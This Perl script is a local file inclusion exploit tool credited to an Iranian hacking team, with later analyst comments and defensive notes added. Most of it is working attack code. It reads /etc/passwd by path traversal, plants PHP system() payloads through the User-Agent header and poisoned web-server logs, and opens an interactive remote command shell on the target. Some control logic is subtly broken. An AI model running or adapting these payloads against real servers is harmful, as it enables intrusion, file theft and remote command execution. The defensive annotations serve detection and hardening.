#!/usr/bin/perl

#Iranian Dark Coders Team
#WwW.IDC-TeaM.NeT
#Coded BY M.R.S.CO 
#We Are : M.R.S.CO , N3O , Black.Hack3r
#LFI ExplOiter
#ver : 1.1
# Clear the terminal with the platform's own command ('cls' on Windows,
# 'clear' everywhere else).
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); 
# Print the tool banner (name, version, update date, code name) to STDOUT.
print q (

                --=[LFI ExplOiter
        +---++---==[Version : 1.1
        +---++---==[Update Date : [2013/09/03]
                --=[Code name : DarkAngel

);
# Route SIGINT (Ctrl+C) to the interrupt() sub that follows.
$SIG{INT} = \&interrupt;
# SIGINT handler: write a shutdown notice to STDOUT, then end the process.
sub interrupt {
    my $notice = "\n[+] (Ctrl + C) Detected, shutting down\n";
    print $notice;
    exit;
}
use LWP::UserAgent;
use LWP::Simple;
# Shared LWP::UserAgent with a 15-second timeout and a fixed User-Agent string.
# Analyst note: 'LFI Expl0iter' is a static indicator worth searching for in
# web access logs. The bare get() calls used elsewhere in this script come
# from LWP::Simple, which by default sends its own agent string, so those
# requests do not carry this value.
$ua = LWP::UserAgent ->new;
$ua->timeout(15);
$ua->agent('LFI Expl0iter');
# Prompt for the base URL; every later request is built by appending a path to
# this string, so the operator is expected to end it at the parameter value
# (see the example in the prompt).
print "\n\t Enter Target [Example:http://site.il/idc.php?id=]";
print "\n\n \t Enter Target : ";
$Target=<STDIN>;
chomp($Target);
# Input that does not contain "http://" is overwritten with "http://$host".
if($Target !~ /http:\/\//) { $Target = "http://$host"; };


# Traversal-depth probe.
# Each pass appends one more "../" to $dot and requests
# <target><dots>etc/passwd twice: once as-is and once with a trailing "%00".
# A body containing ":root:", ":x:" or ":0:" (case-insensitive) counts as a
# hit; $u is set to "" or "%00" to record which form matched and $tf=2 ends
# the loop. When the counter $t reaches 25 the script reports failure and
# jumps to the `en` label.
#
# Defender view: a burst of requests against one parameter with a growing run
# of "../" ending in etc/passwd, with and without %00, is a strong LFI-scan
# signature. Mitigate by never building include/file paths from request
# input (map an allow-listed key to a fixed path) and by confining PHP with
# open_basedir; PHP 5.3.4 and later reject NUL bytes in paths.
$tf=1;$t=0;
print "\n\n\t\t[+] processing ...\n\n\n";
print "[+] Finding passwd\n";


while($tf==1)
{
  $t=$t+1;
  if ($t==25){print "[+] Passwd Not Found!!"; goto en;}
  $dot=$dot . "../";
  
  # Two LWP::Simple fetches per depth: plain path and NUL-terminated path.
  $source=get $Target . $dot . "etc/passwd";
  $source2=get $Target .$dot . "etc/passwd%00";
  
  if (($source =~ m/:root:/i || $source =~ m/:x:/i || $source =~ m/:0:/i))
  {
	 $u="";
     $tf=2;
  }
 if (($source2 =~ m/:root:/i || $source2 =~ m/:x:/i || $source2 =~ m/:0:/i))
  {
	 $u="%00";
     $tf=2;
  } 
}

# /proc/self/environ stage.
# Reports the passwd URL found by the previous loop, then reuses the same
# traversal prefix ($dot) and suffix ($u) to request proc/self/environ while
# the User-Agent header is set to a PHP snippet. The two 32-hex-digit strings
# tested for are presumably the MD5 digests that snippet would echo
# (md5("idc") and md5("darkcoders")) -- not verified here. If the second
# request's decoded body contains the first marker, the script prompts on
# STDIN and enters a loop that reads a line, embeds it in the User-Agent
# snippet, repeats the request and prints the text between the two markers.
#
# Defender view: the reliable indicators are a User-Agent header containing
# "<?php" and a request whose parameter resolves to proc/self/environ.
# Block or alert on both at the WAF/reverse proxy. The root fix is the same
# as for any LFI: do not pass request input to include/require, restrict the
# PHP runtime with open_basedir, and keep dangerous functions such as
# system() disabled where the application does not need them.
print "Passwd Path : " . $Target . $dot . "etc/passwd" . $u . "\n\n OS is Linux \n";

print "\n[+] Finding environ\n";

  # From here on $ua sends PHP source text as its User-Agent value.
  $ua->agent('<?php echo md5("idc"); system("dir"); echo md5("darkcoders"); ?>');
  $source=$ua->get($Target . $dot . "proc/self/environ" . $u);
if ($source =~ "cca5e614d1755faf382e2c678bd45a19" || $source =~ "cc5626d72060f33213f000693616ff9e")
{
   print "environ Path : \n" . $Target . $dot . "proc/self/environ" . $u . "\n"; 
   print "\n[+] Testing environ method\n";
  $ua->agent('<?php echo md5("idc"); system("idc"); echo md5("darkcoders"); ?>');
  $response=$ua->get($Target . $dot . "proc/self/environ" . $u);
  if ($response->decoded_content =~ "cca5e614d1755faf382e2c678bd45a19")
  {
    print "\nenviron method is Exploitable\nAre You Test other method ? (y/N)";
    chomp($xx=<STDIN>);
    if ($xx =~ 'N' || $xx =~ 'n'){
    while($cmd=="exit")
    {
      print "\n\nEnter Your Command : ";
      $cmd=<STDIN>;
      chomp($cmd);
      # The typed line is concatenated unescaped into the header value.
      $ua->agent('<?php echo md5("idc"); system("' . $cmd . '"); echo md5("darkcoders"); ?>');
      $response=$ua->get($Target . $dot . "proc/self/environ" . $u);
      # Slice out the text between the two 32-character markers.
      $between=substr($response->decoded_content, index($response->decoded_content, 'cca5e614d1755faf382e2c678bd45a19')+32, index($response->decoded_content, 'cc5626d72060f33213f000693616ff9e') - index($response->decoded_content, 'cca5e614d1755faf382e2c678bd45a19')-32);
      print "\n". $between;
     }}
  }else{ print "\n[+] environ method is dont work !\n";}
}else{print "\n[+] environ is Not Found !\n";}


# `en` is the jump target used when the passwd probe gives up; execution also
# falls through to here after the environ stage.
# Windows fingerprint: one request for windows/win.ini behind a fixed run of
# "../", matched against strings typical of that file. A hit only prints a
# message; nothing else in the script depends on it.
# Defender view: requests whose parameter ends in windows/win.ini are a
# common traversal canary and are worth alerting on regardless of status.
en:;
$source=get $Target."../../../../../../../../../windows/win.ini";
 if (($source =~ m/mod=MPEGVideo/i || $source =~ m/MCI Extensions.BAK/i || $source =~ m/extensions/i || $source =~ m/OLEMessaging/i || $source =~ m/Windows XP/i))
  {
     print "\n[+]  OS is Windows \n ";
  } 
  
  
     print "\n[+] Finding logs \n ";
# Candidate web-server log locations, each already prefixed with a fixed
# number of "../". The loop after this list appends every entry to $Target.
# The entries cover Apache/httpd access and error logs under /etc/httpd,
# /var/log, /var/www, /usr/local/apache*, /opt/lampp, /opt/xampp and a
# Windows "Program Files" layout; the list contains repeated entries.
# Defender view: this is effectively a checklist of log files that should
# not be readable by the account the PHP runtime executes as, and of path
# suffixes to alert on when they appear in a request parameter.
@lfi = ('../apache/logs/error.log',
'../apache/logs/access.log',
'../../apache/logs/error.log',
'../../apache/logs/access.log',
'../../../apache/logs/error.log',
'../../../apache/logs/access.log',
'../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../etc/httpd/logs/acces.log',
'../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../etc/httpd/logs/error.log',
'../../../../../../../var/www/logs/access_log',
'../../../../../../../var/www/logs/access.log',
'../../../../../../../usr/local/apache/logs/access_ log',
'../../../../../../../usr/local/apache/logs/access. log',
'../../../../../../../var/log/apache/access_log',
'../../../../../../../var/log/apache2/access_log',
'../../../../../../../var/log/apache/access.log',
'../../../../../../../var/log/apache2/access.log',
'../../../../../../../var/log/access_log',
'../../../../../../../var/log/access.log',
'../../../../../../../var/www/logs/error_log',
'../../../../../../../var/www/logs/error.log',
'../../../../../../../usr/local/apache/logs/error_l og',
'../../../../../../../usr/local/apache/logs/error.l og',
'../../../../../../../var/log/apache/error_log',
'../../../../../../../var/log/apache2/error_log',
'../../../../../../../var/log/apache/error.log',
'../../../../../../../var/log/apache2/error.log',
'../../../../../../../var/log/error_log',
'../../../../../../../var/log/error.log',
'../../../../../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../../../../var/log/httpd/error_log',
'../../../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../../var/log/httpd/error_log',
'../apache/logs/error.log',
'../apache/logs/access.log',
'../../apache/logs/error.log',
'../../apache/logs/access.log',
'../../../apache/logs/error.log',
'../../../apache/logs/access.log',
'../../../../apache/logs/error.log',
'../../../../apache/logs/access.log',
'../../../../../apache/logs/error.log',
'../../../../../apache/logs/access.log',
'../apache2/logs/error.log',
'../apache2/logs/access.log',
'../../apache2/logs/error.log',
'../../apache2/logs/access.log',
'../../../apache2/logs/error.log',
'../../../apache2/logs/access.log',
'../../../../apache2/logs/error.log',
'../../../../apache2/logs/access.log',
'../../../../../apache2/logs/error.log',
'../../../../../apache2/logs/access.log',
'../logs/error.log',
'../logs/apache_error.log',
'../logs/access.log',
'../../logs/error.log',
'../../logs/access.log',
'../../../logs/error.log',
'../../../logs/access.log',
'../../../../logs/error.log',
'../../../../logs/access.log',
'../../../../../logs/error.log',
'../../../../../logs/access.log',
'../../../../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../../../etc/httpd/logs/acces.log',
'../../../../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../../../etc/httpd/logs/error.log',
'../../../../../../../../../../usr/local/apache/logs/access_log',
'../../../../../../../../../../usr/local/apache/logs/access.log',
'../../../../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../../../usr/local/apache/logs/error.log',
'../../../../../../../../../../usr/local/apache2/logs/access_log',
'../../../../../../../../../../usr/local/apache2/logs/access.log',
'../../../../../../../../../../usr/local/apache2/logs/error_log',
'../../../../../../../../../../usr/local/apache2/logs/error.log',
'../../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../var/www/logs/access.log',
'../../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../var/www/logs/error.log',
'../../../../../../../../../../var/log/httpd/access_log',
'../../../../../../../../../../var/log/httpd/access.log',
'../../../../../../../../../../var/log/httpd/error_log',
'../../../../../../../../../../var/log/httpd/error.log',
'../../../../../../../../../../var/log/apache/access_log',
'../../../../../../../../../../var/log/apache/access.log',
'../../../../../../../../../../var/log/apache/error_log',
'../../../../../../../../../../var/log/apache/error.log',
'../../../../../../../../../../var/log/apache2/access_log',
'../../../../../../../../../../var/log/apache2/access.log',
'../../../../../../../../../../var/log/apache2/error_log',
'../../../../../../../../../../var/log/apache2/error.log',
'../../../../../../../../../../var/log/access_log',
'../../../../../../../../../../var/log/access.log',
'../../../../../../../../../../var/log/error_log',
'../../../../../../../../../../var/log/error.log',
'../../../../../../../../../../opt/lampp/logs/access_log',
'../../../../../../../../../../opt/lampp/logs/error_log',
'../../../../../../../../../../opt/xampp/logs/access_log',
'../../../../../../../../../../opt/xampp/logs/error_log',
'../../../../../../../../../../opt/lampp/logs/access.log',
'../../../../../../../../../../opt/lampp/logs/error.log',
'../../../../../../../../../../opt/xampp/logs/access.log',
'../../../../../../../../../../opt/xampp/logs/error.log',
'../../../../../../../../../../Program Files\Apache Group\Apache\logs\access.log',
'../../../../../../../../../../Program Files\Apache Group\Apache\logs\error.log',
'../../../apache/logs/error.log',
'../../../apache/logs/access.log',
'../../../../apache/logs/error.log',
'../../../../apache/logs/access.log',
'../../../../../apache/logs/error.log',
'../../../../../apache/logs/access.log',
'../../../../../../apache/logs/error.log',
'../../../../../../apache/logs/access.log',
'../../../../../../../apache/logs/error.log',
'../../../../../../../apache/logs/access.log',
'../../../../../../../../apache/logs/error.log',
'../../../../../../../../apache/logs/access.log',
'../../../logs/error.log',
'../../../logs/access.log',
'../../../../logs/error.log',
'../../../../logs/access.log',
'../../../../../logs/error.log',
'../../../../../logs/access.log',
'../../../../../../logs/error.log',
'../../../../../../logs/access.log',
'../../../../../../../logs/error.log',
'../../../../../../../logs/access.log',
'../../../../../../../../logs/error.log',
'../../../../../../../../logs/access.log',
'../../../../../../../../../../../../etc/httpd/logs/acces_log',
'../../../../../../../../../../../../etc/httpd/logs/acces.log',
'../../../../../../../../../../../../etc/httpd/logs/error_log',
'../../../../../../../../../../../../etc/httpd/logs/error.log',
'../../../../../../../../../../../../var/www/logs/access_log',
'../../../../../../../../../../../../var/www/logs/access.log',
'../../../../../../../../../../../../usr/local/apache/logs/access_log',
'../../../../../../../../../../../../usr/local/apache/logs/access.log',
'../../../../../../../../../../../../var/log/apache/access_log',
'../../../../../../../../../../../../var/log/apache/access.log',
'../../../../../../../../../../../../var/log/access_log',
'../../../../../../../../../../../../var/www/logs/error_log',
'../../../../../../../../../../../../var/www/logs/error.log',
'../../../../../../../../../../../../usr/local/apache/logs/error_log',
'../../../../../../../../../../../../usr/local/apache/logs/error.log',
'../../../../../../../../../../../../var/log/apache/error_log',
'../../../../../../../../../../../../var/log/apache/error.log',
'../../../../../../../../../../../../var/log/access_log',
'../../../../../../../../../../../../var/log/error_log');
# Log-inclusion probe.
# For every path in @lfi the script requests <target><path> followed by "&"
# and a string that begins with "<?php", then looks in the body for the two
# 32-hex-digit markers used by the earlier stage. The same probe is repeated
# with "%00" placed after the path. On a match it prints the URL, sets $ff,
# prompts on STDIN and enters a loop that reads a line, places it in an
# `idc=` query parameter on the same path, and prints the text found between
# the 'idc-team' and 'mrsco' markers in the response. If $ff is still 0 after
# the whole list, "LOG not found" is printed.
#
# Defender view: this is the log-poisoning form of LFI. Indicators are
# request URIs that contain "<?php", a sweep of traversal-prefixed log-file
# paths against one parameter, and an `idc=` query parameter. Mitigations:
# remove request input from include/require paths (allow-list instead), keep
# web-server logs unreadable by the PHP runtime account, and enforce
# open_basedir so log directories are outside the permitted tree.
$ff=0;
foreach $scan(@lfi){

# Probe without NUL suffix.
$source=get $Target.$scan . "&<?php echo(md5('idc')); system($_GET['idc']); echo md5('darkcoders'); ?>";
 if (($source =~ m/cca5e614d1755faf382e2c678bd45a19/i || $source =~ m/cc5626d72060f33213f000693616ff9e/i ))
  {
     print "\n" . $Target.$scan;
     $ff=1; 
      print "\n[+] logs method is Exploitable\n Are You Test other method ? (y/N)";
    chomp($x=<STDIN>);
    if ($x="N"){
    while($cmd=="exit")
    {
      print "\n\nEnter Your Command : ";
      $cmd=<STDIN>;
      chomp($cmd);
      # Restore the plain tool User-Agent for this stage.
      $ua->agent('LFI Expl0iter');

	  $response=$ua->get($source=get $Target.$scan."&idc=".$cmd);
      # Slice out the text between the 'idc-team' and 'mrsco' markers.
      $between=substr($response->decoded_content, index($response->decoded_content, 'idc-team')+8, index($response->decoded_content, 'mrsco') - index($response->decoded_content, 'idc-team')-8);
      print "\n". $between;
}}}

# Same probe with "%00" after the path; the request is issued twice.
$source=get $Target.$scan . "%00&<?php echo(md5('idc')); system($_GET['idc']); echo md5('darkcoders'); ?>";
$source=get $Target.$scan . "%00&<?php echo(md5('idc')); system($_GET['idc']); echo md5('darkcoders'); ?>";
 if (($source =~ m/cca5e614d1755faf382e2c678bd45a19/i || $source =~ m/cc5626d72060f33213f000693616ff9e/i ))
  {
     print "\n" . $Target.$scan."%00";
     $ff=1; 
      print "\n[+] logs method is work\n Are You Test other method ? (Y/N)";
    chomp($x=<STDIN>);
    if ($x="N"){
    while($cmd=="exit")
    {
      print "\n\nEnter Your Command : ";
      $cmd=<STDIN>;
      chomp($cmd);
      $ua->agent('LFI Expl0iter');

	  $response=$ua->get($source=get $Target.$scan."%00&idc=echo 'idc-team' ; ".$cmd."echo 'mrsco'");
      $between=substr($response->decoded_content, index($response->decoded_content, 'idc-team')+8, index($response->decoded_content, 'mrsco') - index($response->decoded_content, 'idc-team')-8);
      print "\n". $between;
}}}

}
if ($ff==0){print ("\n[+] LOG not found ! \n");}
